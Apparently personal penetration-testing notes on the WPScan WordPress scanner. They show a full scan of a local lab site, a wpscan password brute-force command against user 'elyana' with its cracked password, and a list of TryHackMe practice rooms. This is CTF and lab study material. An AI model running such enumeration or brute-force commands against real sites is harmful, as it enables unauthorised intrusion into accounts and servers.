https://wpscan.com/wordpress-security-scanner
Source code on GitHub: https://github.com/wpscanteam/wpscan
# wpscan --url http://127.0.0.1:8080
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.14
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://127.0.0.1:8080/ [127.0.0.1]
[+] Started: Sat Mar 13 09:41:21 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1:8080/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://127.0.0.1:8080/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1:8080/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9.5 identified (Insecure, released on 2018-04-03).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1:8080/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.5'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1:8080/, Match: 'WordPress 4.9.5'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <===========================================> (22 / 22) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Mar 13 09:41:32 2021
[+] Requests Done: 47
[+] Cached Requests: 4
[+] Data Sent: 11.353 KB
[+] Data Received: 122.766 KB
[+] Memory used: 193.074 MB
[+] Elapsed time: 00:00:11
#
Brute force password
wpscan --url http://10.10.87.140/wordpress -U elyana -P pass2.txt ... [!] Valid Combinations Found: | Username: elyana, Password: H@ckme@123 ...
Practice
>>> THM | Badbyte
>>> THM | Wekor
>>> THM | Internal